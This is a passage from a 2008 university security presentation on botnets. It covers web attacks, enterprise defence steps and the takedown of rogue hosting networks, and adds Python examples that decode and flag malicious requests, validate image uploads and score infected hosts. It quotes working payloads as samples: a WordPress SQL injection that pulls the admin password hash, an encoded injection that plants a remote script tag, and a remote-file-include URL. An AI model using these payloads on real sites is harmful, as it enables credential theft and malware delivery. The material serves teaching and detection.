[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3 45819 192.168.22.155 80
--c295b75d-B--
GET /shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.somwhere-in.pdx.edu
Connection: close
--c295b75d-H--

Page 68

mod-sec

Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]
Stopwatch: 1212486727810932 339469 (2354 3333 -)
Producer: ModSecurity v2.1.5 (Apache 2.x)
Server: Apache/2.2.8 (OpenPKG/CURRENT)
--c295b75d-Z--

Page 69

Obfu73ca74ion

Encoded:
page=-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A

Decoded:
-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*
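
The three server-side slides (PHP include, SQL injection, obfuscation) share one detection problem: the request has to be decoded before any pattern will match it. The script below is an added example (not from the slides, not ModSecurity) that reproduces the decoding step, turning the encoded page= parameter above back into the plain payload, and then applies a few deliberately narrow patterns for remote includes, union-select injection and injected script tags. ModSecurity's core rule shown on the previous slide is far broader; this is the minimum a log-mining job needs. The request lines are constructed from the PHP-include, SQL-injection and obfuscation slides; the /index.php path for the third is assumed.

```python
"""Decode obfuscated query strings and flag remote-include and SQL-injection attempts.

Added example, not from the slides and not ModSecurity. The request lines are
constructed from the deck's three server-attack examples; the /index.php path
for the obfuscated one is assumed. The patterns are illustrative and narrow.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")          # MySQL 0x... string literal
SQLI = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.IGNORECASE | re.DOTALL)
RFI = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)  # include($var) fed a URL

SAMPLE_REQUESTS = [  # constructed from the slides
    "GET /a.php?vuln=http://webhost.com/evil.php HTTP/1.0",
    "GET /shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,"
    "CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.0",
    "GET /index.php?page=-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c"
    "0x3c736372697074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A HTTP/1.1",
    "GET /index.php?page=2&cat=news HTTP/1.1",
]


def decode_param(value):
    """Percent-decode until stable (catches double encoding), then expand 0x literals."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)

    def expand(match):
        try:
            return bytes.fromhex(match.group(1)).decode("utf-8")
        except ValueError:          # odd length or not valid UTF-8: leave it alone
            return match.group(0)

    return HEX_LITERAL.sub(expand, value)


def classify_request(request_line):
    """Return [(param, finding, decoded_value), ...] for one access-log request line."""
    method, target = request_line.split()[:2]
    findings = []
    # parse_qsl already turns '+' into spaces and does one round of %-decoding.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode_param(raw)
        if RFI.match(decoded):
            findings.append((name, "remote-include", decoded))
        if SQLI.search(decoded):
            findings.append((name, "sql-injection", decoded))
        if "<script" in decoded.lower():
            findings.append((name, "script-tag", decoded))
    return findings


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        for param, finding, decoded in classify_request(line):
            print(f"{finding:15} {param}={decoded}")
```

Running it over the obfuscated request yields exactly the decoded line on this slide, which is the point: a signature written against the encoded form would miss the next variant, while one applied after decoding does not care how the attacker spelled "union".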

Page 70

Pictures

phpBB photo galleries that permit users to post their own pictures

(Diagram: Attacker and Webhost.com.)

1. Evil user posts an executable file with a .gif extension (notapic.gif)
2. Evil user browses to the executable gif
3. Webhost executes notapic.gif as web page owner
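
The gallery accepts notapic.gif because it trusts the extension. The check below is an added example (not phpBB code, not from the slides) of what the upload handler should do instead: accept only one known image extension, require the file's leading bytes to match that type's signature, reject files carrying script markers behind a valid signature, and store under a generated name rather than the one the user supplied. The GIF/PNG/JPEG signatures are the standard ones; the sample uploads are constructed byte strings. Serving uploads from a directory the web server will not execute from is the other half of the fix and is outside what this check can do.

```python
"""Reject uploads whose bytes do not match the image type their name claims.

Added example, not phpBB code and not from the slides. Signatures are the
standard GIF/PNG/JPEG magic numbers; the sample uploads are constructed.
"""
import hashlib
import os

MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Constructed samples: a minimal GIF, an ELF binary, PHP source, and a
# polyglot that carries a valid GIF signature in front of PHP.
GOOD_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";"
ELF_AS_GIF = b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 24
PHP_AS_GIF = b"<?php echo 'hello'; ?>"
POLYGLOT_GIF = b"GIF89a<?php echo 'hello'; ?>"


def validate_upload(filename, data):
    """Return (accepted, reason) for a proposed image upload."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"   # blocks pic.php.gif and .htaccess
    ext = "." + parts[1]
    signatures = MAGIC.get(ext)
    if signatures is None:
        return False, f"extension {ext} not allowed"
    if not any(data.startswith(sig) for sig in signatures):
        return False, f"content does not match {ext}"    # notapic.gif fails here
    if b"<?" in data or b"<script" in data.lower():
        return False, "embedded script markers"           # cheap polyglot heuristic
    return True, "ok"


def storage_name(data, ext):
    """Name the stored file by content hash so the user's filename never reaches disk."""
    return hashlib.sha256(data).hexdigest()[:16] + ext


if __name__ == "__main__":
    for name, blob in [("cat.gif", GOOD_GIF), ("notapic.gif", ELF_AS_GIF),
                       ("notapic.gif", PHP_AS_GIF), ("pic.gif", POLYGLOT_GIF),
                       ("pic.php.gif", GOOD_GIF)]:
        ok, why = validate_upload(name, blob)
        print(f"{name:12} {'accept' if ok else 'reject'}: {why}")
```

The polyglot case shows why the signature check alone is not enough: a file can start with GIF89a and still be handed to the PHP interpreter if the server maps it there, so the marker scan and the no-execute upload directory both stay in.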

Page 71

Other means

Profiles of user accounts (Social Networking sites)

Comment sections that don’t require the user to authenticate

BB’s that permit users to create their own accounts without an administrator

User web pages

Departmental web pages

Traditional network vulnerability attacks

Page 72

Protect Your Enterprise

AVOIDANCE

1. Establish a perimeter and segregate valuable or dangerous network segments. Make FW rules accountable and require change control

PREVENT

1. Ensure that all enterprise and local accounts have strong passwords. Configure Domain security policy to enforce this and auto-lockout

2. Eliminate all generic accounts. Where possible make all non-user accounts services.

3. Eliminate or encapsulate all unencrypted authentication

4. Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of mod-sec for apache websites)

5. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts

6. Block outbound port 25 traffic except from your official mail servers

7. Block outbound DNS requests except for iterative requests made through the official DNS servers (prevents spray and pray attacks)

Page 73

Protect Your Enterprise

DETECT

1. Install and operate IDS/IPS systems (snort, etc)

2. Analyze network traffic for heuristic evidence of botlike behavior

3. Google your own site (e.g. site:mysite.com viagra, site:mysite.com c99)

4. Centralize and process logs, including workstation security and firewall logs.

5. Mine your anti-virus quarantines, abuse notifications, infected systems for intelligence about botnet infections. Feed this information to your event correlation system

6. Participate or join quasi-intelligence organizations

MITIGATE

1. Use intelligence data in your DNS server to block access to C&C sites and malware distribution sites.

2. Use your centralized logs to detect and react to password guessing schemes in near-realtime.

3. Report detections to an incident response team that will quarantine compromised systems, determine physical location, and direct IT staff to retrieve the system, extract first responder data and intelligence, re-image the system, then return it to the system owner along with a report on the successful attack vector.

4. Include known malware distribution sites in your proxy server block lists

5. Establish a spearphishing hotline for quick response.

Page 74

Protect Your Enterprise

REDUCE THE THREAT

1. Report new threats. Phishing attacks to Anti-Phishing Working Group. Botnet clients/C&C to isotf.org.

2. Feed the Bot related DNS attempts to your event correlation system

3. Add SiteAdvisor or IE7 anti-phishing feature to browsers

REDUCE THE VULNERABILITY

1. Actively scan your site for vulnerabilities (OS, network, web apps, etc)

NON-REALTIME ANALYSIS, DETECTION, and RECOVERY

1. Analyze data collected to identify new intelligence markers.

2. Evaluate new signatures, new tools, etc.

3. Use non-realtime data to develop strategies for ranking confidence related to available data and intelligence.

4. Use Forensic techniques and sandbox technology to gather intelligence from known compromised workstations.
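
The "Responding to Detection" flow, the DETECT item about feeding quarantines and abuse notices into an event correlation system, and item 3 above (ranking confidence across data sources) all describe the same mechanism: several weak sensors reporting on the same internal host add up to a decision. The script below is an added example (not from the slides) that groups sensor reports by host, combines them into one confidence score, and maps the score to the next step in the flow (watch, open a tracking ticket, or also block network access). The sensor names mirror the flow (NERO and McAfee reputation hits, "acting bad" and "talking to bad" traffic flags, AV quarantines, user reports), but the weights, thresholds, sample events and the noisy-OR combination rule are assumptions chosen for illustration, to be tuned against your own data.

```python
"""Correlate botnet sensor reports per host and rank confidence before ticketing.

Added example, not from the slides. Sensor names mirror the deck's response
flow; weights, thresholds, the combination rule and the sample events are
assumptions for illustration.
"""
from collections import defaultdict

# Assumed per-sensor confidence: probability that a single hit from this
# source means a real infection. Repeated hits from one sensor count once.
WEIGHTS = {
    "nero_says_bad": 0.3,
    "mcafee_says_bad": 0.5,
    "av_quarantine": 0.5,
    "acting_bad": 0.5,
    "talking_to_bad": 0.5,
    "user_report": 0.2,
}
TICKET_THRESHOLD = 0.5   # create tracking ticket, identify location and owner
BLOCK_THRESHOLD = 0.8    # also block network access now, then retrieve and image

# Constructed sample events: (internal host, sensor kind).
SAMPLE_EVENTS = [
    ("10.0.0.10", "nero_says_bad"),
    ("10.0.0.10", "talking_to_bad"),
    ("10.0.0.10", "acting_bad"),
    ("10.0.0.20", "mcafee_says_bad"),
    ("10.0.0.30", "user_report"),
    ("10.0.0.30", "user_report"),
]


def combine(kinds):
    """Noisy-OR: independent sensors raise confidence, never past 1.0."""
    miss = 1.0
    for kind in kinds:
        miss *= 1.0 - WEIGHTS[kind]
    return round(1.0 - miss, 3)


def correlate(events):
    """Group events by host and return {host: {score, sources, action}}."""
    by_host = defaultdict(set)
    for host, kind in events:
        by_host[host].add(kind)
    results = {}
    for host, kinds in by_host.items():
        score = combine(kinds)
        if score >= BLOCK_THRESHOLD:
            action = "block+ticket"
        elif score >= TICKET_THRESHOLD:
            action = "ticket"
        else:
            action = "watch"
        results[host] = {"score": score, "sources": sorted(kinds), "action": action}
    return results


def ranked(results):
    """Hosts ordered for the response queue: highest confidence first."""
    return sorted(results, key=lambda h: results[h]["score"], reverse=True)


if __name__ == "__main__":
    found = correlate(SAMPLE_EVENTS)
    for host in ranked(found):
        r = found[host]
        print(f"{host:12} {r['score']:.3f} {r['action']:13} {', '.join(r['sources'])}")
```

The host that is both acting bad and talking to bad, with a reputation hit on top, lands above the block threshold; a lone AV verdict earns a ticket; a single user report is kept on watch until another sensor agrees. That ordering is what the non-realtime analysis in this slide is meant to tune.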

Page 75

RBN

Page 76

RBN Operations

(Diagram of RBN operations, 11/21/07, ref: Bizeul.org. Entities shown: SPB IX, DELTASYS, DATAPOINT, INFOBOX, RBN, SILVERNET, CREDOLINK, OINVEST.)

Page 77

RBN USA Dead?

It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.

Page 78

RBN USA Dead?

Page 79

What Happened?

http://www.betanews.com/article/UnitedLayer_COO_Giving_access_to_InterCage_is_an_issue_of_ethics/1222396858

Company after company dropped relations with InterCage in the wake of multiple reports documenting its shady dealings,

Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave Donaldson's people the power to send InterCage dark or, as he chose to do, stick InterCage in a sandbox.

By Angela Gunn, BetaNews September 25, 2008, 10:40 PM

Page 80

McColo


Page 81

Effect of De-peering

50% Drop in Spam

Page 82

Who’s Next?

In the wake of the demise of Atrivo/Intercage and McColo, attention has focused on other badware nets these entities formerly hosted.

EstDomains, Esthost, Hostfresh, Cernel

EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly once acted as the IP registrar for RBN domains. Malicious Web site hosting nasties like CoolWebSearch and other spyware programs trace back to EstDomains. Tsastsin has links to organized crime and also heads up Rove Digital, a site also suspected of hosting malware servers.

Anti-spam group Spamhaus called EstDomain, Esthost, Cernel, and Hostfresh, the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August 2008 as backed by "gangs of cybercriminals" whose disappearance from the Web would be difficult to achieve, but would result in a safer Internet.

Page 83

Agenda

• Botnet Overview
• Botnet Schemes
• How Do They Get In?
• What Can We Do?
• Concluding Thoughts

Page 84

Source of all evil

Page 85

Q&A

Questions?

Craig A Schiller, CISSP-ISSMP, [email protected]

Portland State University
CISO